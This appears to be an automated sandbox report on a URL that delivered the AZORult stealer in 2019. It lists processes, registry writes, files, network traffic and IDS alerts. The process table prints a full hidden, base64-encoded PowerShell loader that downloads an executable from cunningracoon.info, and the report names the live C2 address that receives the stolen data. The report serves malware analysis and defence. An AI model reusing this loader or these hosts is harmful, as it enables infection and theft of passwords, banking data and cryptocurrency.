| URL: | http://91.90.195.48/dZRj3L |
| Full analysis: | https://app.any.run/tasks/e1a0e8fd-4772-47de-9196-cc33cd491f59 |
| Verdict: | Malicious activity |
| Threats: | AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat. |
| Analysis date: | May 23, 2019, 23:27:17 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MD5: | 71EF13BB378B4EDE6BCCBFAD08222D9A |
| SHA1: | 6DFEDF8A2015A5585E683457F70059F3F2087F36 |
| SHA256: | 3C1577C2D57091A0AC3722D0DCD3499C27405551D6C9F5C2459DAB6C90DABEC0 |
| SSDEEP: | 3:N1K0lH03PWp:C0lum |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 932 | powershell.exe -w hidden -noni -enc WwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwBVADMAbAB6AGQARwBWAHQATABrADEAaABiAG0ARgBuAFoAVwAxAGwAYgBuAFEAdQBRAFgAVgAwAGIAMgAxAGgAZABHAGwAdgBiAGkANQBCAGIAWABOAHAAVgBYAFIAcABiAEgATQA9ACcAKQApACkALgBHAGUAdABGAGkAZQBsAGQAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAWQBXADEAegBhAFUAbAB1AGEAWABSAEcAWQBXAGwAcwBaAFcAUQA9ACcAKQApACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACQAdAByAHUAZQApADsAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAiAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AFsAUwB0AHIAdQBjAHQATABhAHkAbwB1AHQAKABMAGEAeQBvAHUAdABLAGkAbgBkAC4AUwBlAHEAdQBlAG4AdABpAGEAbAApAF0AcAB1AGIAbABpAGMAIABzAHQAcgB1AGMAdAAgAGwAbABsAEkAbAAxADEAbABsAEkAewBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAAbABJAGwAMQBJAGwAOwBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAAbABJADEAbABsADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAASQBsAEkAMQAxADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAASQBsAGwAbAAxAEkAOwB9AFsAUwB0AHIAdQBjAHQATABhAHkAbwB1AHQAKABMAGEAeQBvAHUAdABLAGkAbgBkAC4AUwBlAHEAdQBlAG4AdABpAGEAbAAsAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AVQBuAGkAYwBvAGQAZQApAF0AcAB1AGIAbABpAGMAIABzAHQAcgB1AGMAdAAgAGwAbABsADEAMQB7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkAbABsADEAMQBJAGwAMQBJADEASQA7AHAAdQBiAGwAaQBjACAAcwB0AHIAaQBuAGcAIABJAEkASQBJAEkASQBsADEAMQBsADEAbAA7AHAAdQBiAGwAaQBjACAAcwB0AHIAaQBuAGcAIABsADEAbAAxAGwAbABsAEkASQA7AHAAdQBiAGwAaQBjACAAcwB0AHIAaQBuAGcAIABJADEAbABJAEkAMQAxAGwASQA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAGwAMQBsAEkASQAxAEkASQAxAGwASQA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAGwASQAxAEkASQBsAGwAbABsADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAbAAxAEkASQBJAEkAMQBsAEkASQBJADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAbAAxAEkAbABJADEAMQAxADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAASQAxADEASQBsAGwAOwBwAHUAYgBsAGkAYwAgAHUAaQBuAHQAIABsADEAMQBsAGwASQBsADEAbABsADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAASQBsADEAMQBJAEkAbAA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkASQAxADEAbAA7AHAAdQBiAGwAaQBjACAAcwBoAG8AcgB0ACAAbAAxAGwASQAxADsAcAB1AGIAbABpAGMAIABzAGgAbwByAHQAIABsAGwAbABJAEkAbABJADEAMQA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABsAGwASQBJAEkAbAAxADEAOwBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAAbAAxAEkASQAxADEASQA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABsADEASQBsAEkAMQBJAGwAbAA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABsAEkAMQBJADEASQBJAEkASQBsAEkAOwB9ADsAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAGwAbABsADEASQAxAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACIALABTAGUAdABMAGEAcwB0AEUAcgByAG8AcgA9AHQAcgB1AGUAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACgAcwB0AHIAaQBuAGcAIABsADEAMQAxADEASQAxAEkALABzAHQAcgBpAG4AZwAgAEkAMQBJADEAbAAxACwASQBuAHQAUAB0AHIAIABJAGwAbABJAEkASQBsADEAMQAxACwASQBuAHQAUAB0AHIAIABsAGwASQBsADEASQAxADEAMQAsAGIAbwBvAGwAIABJAGwASQBsAGwAMQBJACwAdQBpAG4AdAAgAGwASQAxADEASQBsADEALABJAG4AdABQAHQAcgAgAGwAMQBsAEkAbABsADEAbABsAGwASQAxACwAcwB0AHIAaQBuAGcAIABJAEkAMQAxAEkAMQBsADEALAByAGUAZgAgAGwAbABsADEAMQAgAEkAMQBJAGwAbAAxADEASQAsAG8AdQB0ACAAbABsAGwASQBsADEAMQBsAGwASQAgAEkAbABsAGwAbAAxAGwAbABJADEAKQA7AH0AIgA7ACQAbABsAEkAbAAxADEAbABsAGwAPQAiACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAEwAbwB3AFwAJAAoAC0AagBvAGkAbgAoACgANAA4AC4ALgA1ADcAKQArACgANgA1AC4ALgA5ADAAKQArACgAOQA3AC4ALgAxADIAMgApAHwARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAAOAB8ACUAewBbAGMAaABhAHIAXQAkAF8AfQApACkALgB0AG0AcAAiADsAJABJAEkAMQBJAGwAMQBsAGwAMQAxAGwAMQA9ACcAaAB0AHQAcAA6AC8ALwBjAHUAbgBuAGkAbgBnAHIAYQBjAG8AbwBuAC4AaQBuAGYAbwAvADQAZABEAFUALwBYAGwAVABZAC4AYwBmAG0AbAA/AEwAawBrAGUAVwAzAD0AOAA5ADgAMgAnADsAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAEoARwBOAHMAYQBUADAAbwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBPAFoAWABRAHUAVgAyAFYAaQBRADIAeABwAFoAVwA1ADAASwBUAHMAawBZADIAeABwAEwAawBoAGwAWQBXAFIAbABjAG4ATgBiAEoAMQBWAHoAWgBYAEkAdABRAFcAZABsAGIAbgBRAG4AWABUADAAbgBSAGsARQA1AFcAbABaAFAAZABFAEoAMwBRAGsAbAA0AFoARABoADYATQBpAGMANwBKAEcATgBzAGEAUwA1AEUAYgAzAGQAdQBiAEcAOQBoAFoARQBaAHAAYgBHAFUAbwBKAEUAbABKAE0AVQBsAHMATQBXAHgAcwBNAFQARgBzAE0AUwB3AGsAYgBHAHgASgBiAEQARQB4AGIARwB4AHMASwBUAHMAPQAnACkAKQB8AGkAZQB4ADsAJABsADEASQAxAGwASQBJAGwAbAA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABsAGwAbAAxADEAOwAkAGwAMQBJADEAbABJAEkAbABsAC4AbAAxAGwASQAxAD0AMAB4ADAAOwAkAGwAMQBJADEAbABJAEkAbABsAC4ASQBsAGwAMQAxAEkAbAAxAEkAMQBJAD0AWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAUwBpAHoAZQBPAGYAKAAkAGwAMQBJADEAbABJAEkAbABsACkAOwAkAGwAbABJAGwASQAxAGwAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAbABsAGwASQBsADEAMQBsAGwASQA7AFsAbABsAGwAMQBJADEAXQA6ADoAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAoACQAbABsAEkAbAAxADEAbABsAGwALAAkAGwAbABJAGwAMQAxAGwAbABsACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAJABmAGEAbABzAGUALAAwAHgAMAAwADAAMAAwADAAMAA4ACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAIgBjADoAIgAsAFsAcgBlAGYAXQAkAGwAMQBJADEAbABJAEkAbABsACwAWwByAGUAZgBdACQAbABsAEkAbABJADEAbAApAHwAbwB1AHQALQBuAHUAbABsADsA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | iexplore.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1812 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\Low\RES30CD.tmp" "c:\Users\admin\AppData\Local\Temp\Low\CSC30CC.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) Modules
| |||||||||||||||
| 2084 | "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "PcqYbgWA.tmp" | C:\Windows\system32\cmd.exe | — | PcqYbgWA.tmp | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2848 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\Low\s-sxgvul.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) Modules
| |||||||||||||||
| 3184 | C:\Users\admin\AppData\LocalLow\PcqYbgWA.tmp | C:\Users\admin\AppData\LocalLow\PcqYbgWA.tmp | PcqYbgWA.tmp | ||||||||||||
User: admin Integrity Level: LOW Exit code: 0 Modules
| |||||||||||||||
| 3364 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3612 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3400 | C:\Windows\system32\timeout.exe 3 | C:\Windows\system32\timeout.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: timeout - pauses command processing Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3576 | C:\Users\admin\AppData\LocalLow\PcqYbgWA.tmp | C:\Users\admin\AppData\LocalLow\PcqYbgWA.tmp | — | powershell.exe | |||||||||||
User: admin Integrity Level: LOW Exit code: 0 Modules
| |||||||||||||||
| 3612 | "C:\Program Files\Internet Explorer\iexplore.exe" -nohome | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3936 | C:\Windows\system32\Macromed\Flash\FlashUtil32_26_0_0_131_ActiveX.exe -Embedding | C:\Windows\system32\Macromed\Flash\FlashUtil32_26_0_0_131_ActiveX.exe | — | svchost.exe | |||||||||||
User: admin Company: Adobe Systems Incorporated Integrity Level: MEDIUM Description: Adobe® Flash® Player Installer/Uninstaller 26.0 r0 Exit code: 0 Version: 26,0,0,131 Modules
| |||||||||||||||
| (PID) Process: | (3612) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main |
| Operation: | write | Name: | CompatibilityFlags |
Value: 0 | |||
| (PID) Process: | (3612) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
| (PID) Process: | (3612) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 1 | |||
| (PID) Process: | (3612) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones |
| Operation: | write | Name: | SecuritySafe |
Value: 1 | |||
| (PID) Process: | (3612) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
| Operation: | write | Name: | ProxyEnable |
Value: 0 | |||
| (PID) Process: | (3612) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
| Operation: | write | Name: | SavedLegacySettings |
Value: 4600000071000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000 | |||
| (PID) Process: | (3612) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active |
| Operation: | write | Name: | {5CDCCEFD-7DB2-11E9-A09E-5254004A04AF} |
Value: 0 | |||
| (PID) Process: | (3612) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore |
| Operation: | write | Name: | Type |
Value: 4 | |||
| (PID) Process: | (3612) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore |
| Operation: | write | Name: | Count |
Value: 1 | |||
| (PID) Process: | (3612) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore |
| Operation: | write | Name: | Time |
Value: E30705000400170017001B002C00C600 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3612 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
| 3612 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
| 3364 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@91.90.195[1].txt | — | |
MD5:— | SHA256:— | |||
| 3364 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\0KZCO8Z5\uPmVz[1].txt | — | |
MD5:— | SHA256:— | |||
| 3364 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\O3L0JKC1\4231-nutrilite-manakin[1].jspx | — | |
MD5:— | SHA256:— | |||
| 3364 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\O3L0JKC1\1962_08_13[1].aspx | — | |
MD5:— | SHA256:— | |||
| 3936 | FlashUtil32_26_0_0_131_ActiveX.exe | C:\Users\admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sxx:Zone.Identifier | — | |
MD5:— | SHA256:— | |||
| 3936 | FlashUtil32_26_0_0_131_ActiveX.exe | C:\Users\admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sxx | — | |
MD5:— | SHA256:— | |||
| 3612 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF86085C6DB260101D.TMP | — | |
MD5:— | SHA256:— | |||
| 3612 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{5CDCCEFE-7DB2-11E9-A09E-5254004A04AF}.dat | — | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3184 | PcqYbgWA.tmp | POST | 200 | 217.8.117.16:80 | http://217.8.117.16/3A38D670-F0E0-436D-8A00-FC71822F4632/index.php | unknown | binary | 4.27 Mb | malicious |
3184 | PcqYbgWA.tmp | GET | 200 | 185.194.141.58:80 | http://ip-api.com/json | DE | text | 321 b | malicious |
3364 | iexplore.exe | GET | 302 | 91.90.195.48:80 | http://91.90.195.48/dZRj3L | NL | — | — | unknown |
3184 | PcqYbgWA.tmp | POST | 200 | 217.8.117.16:80 | http://217.8.117.16/3A38D670-F0E0-436D-8A00-FC71822F4632/index.php | unknown | text | 2 b | malicious |
932 | powershell.exe | GET | 200 | 68.183.179.105:80 | http://cunningracoon.info/4dDU/XlTY.cfml?LkkeW3=8982 | US | executable | 150 Kb | suspicious |
3612 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3612 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3364 | iexplore.exe | 91.90.195.48:80 | — | ITL Company | NL | unknown |
3364 | iexplore.exe | 68.183.179.105:443 | cunningracoon.info | DSL Extreme | US | suspicious |
3612 | iexplore.exe | 68.183.179.105:443 | cunningracoon.info | DSL Extreme | US | suspicious |
3984 | iexplore.exe | 68.183.179.105:443 | cunningracoon.info | DSL Extreme | US | suspicious |
3184 | PcqYbgWA.tmp | 185.194.141.58:80 | ip-api.com | netcup GmbH | DE | unknown |
3184 | PcqYbgWA.tmp | 217.8.117.16:80 | — | — | — | malicious |
932 | powershell.exe | 68.183.179.105:80 | cunningracoon.info | DSL Extreme | US | suspicious |
Domain | IP | Reputation |
|---|---|---|
www.bing.com |
| whitelisted |
cunningracoon.info |
| suspicious |
ip-api.com |
| malicious |
PID | Process | Class | Message |
|---|---|---|---|
932 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3184 | PcqYbgWA.tmp | A Network Trojan was detected | MALWARE [PTsecurity] AZORult.Stealer HTTP Header |
3184 | PcqYbgWA.tmp | A Network Trojan was detected | MALWARE [PTsecurity] AZORult Request |
3184 | PcqYbgWA.tmp | Potentially Bad Traffic | ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 |
3184 | PcqYbgWA.tmp | A Network Trojan was detected | MALWARE [PTsecurity] AZORult Response |
3184 | PcqYbgWA.tmp | A Network Trojan was detected | MALWARE [PTsecurity] AZORult.Stealer HTTP Header |
3184 | PcqYbgWA.tmp | Potential Corporate Privacy Violation | ET POLICY External IP Lookup ip-api.com |
3184 | PcqYbgWA.tmp | Potentially Bad Traffic | ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 |